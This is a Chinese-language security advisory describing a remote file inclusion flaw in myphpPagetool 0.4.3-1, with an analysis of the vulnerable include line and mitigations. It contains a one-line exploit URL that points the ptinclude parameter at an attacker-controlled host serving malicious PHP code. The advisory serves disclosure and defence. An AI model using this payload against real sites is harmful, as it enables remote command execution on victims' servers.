myphpPageTool远程文件包含漏洞
2005-10-01
系统编号:
WAVDB-00768
BUGTRAQ: 6744
影响版本:
myphpPagetool 0.4.3-1
程序介绍:
myphpPagetool是一款管理WEB站点的工具,可以方便增加页面。
漏洞分析:
myphpPagetool包含的多个PHP脚本没有正确处理用户提交的URI请求,远程攻击者可以利用这个漏洞包含远程服务器上的文件,以WEB进程权限在系统上执行任意命令。
myphpPagetool中的/doc/admin包含多个PHP脚本文件,如index.php、help1.php、help2.php、 help3.php、help4.php、help5.php、help6.php、help7.php、help8.php和help9.php,这些文件包含如下代码:
----------------------------------------
include ($ptinclude . "/pt_config.inc");
[...]
----------------------------------------
由于$ptinclude变量之前没有任何定义,攻击者可以定义此变量为远程服务器上的任意文件,如果指定的文件包含恶意PHP代码,就可以导致以WEB进程权限在系统上执行任意命令。
漏洞利用:
http://[target]/doc/admin/index.php?ptinclude=http://[attacker]
with :
http://[attacker]/pt_config.inc
解决方案:
临时解决方法:
如果您不能立刻安装补丁或者升级,建议您采取以下措施以降低威胁:
* 修改php.ini配置文件中的选项,设置registers_global = OFF。
* "Frog Man" <leseulfrog@hotmail.com>提供了第三方补丁程序:
http://www.phpsecure.org
厂商补丁:
Sebastian Bunka
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://myphppagetool.sourceforge.net/index.php?mygoog=Homepage
信息来源:
<*来源:Frog Man (leseulfrog@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104428689506537&w=2
*>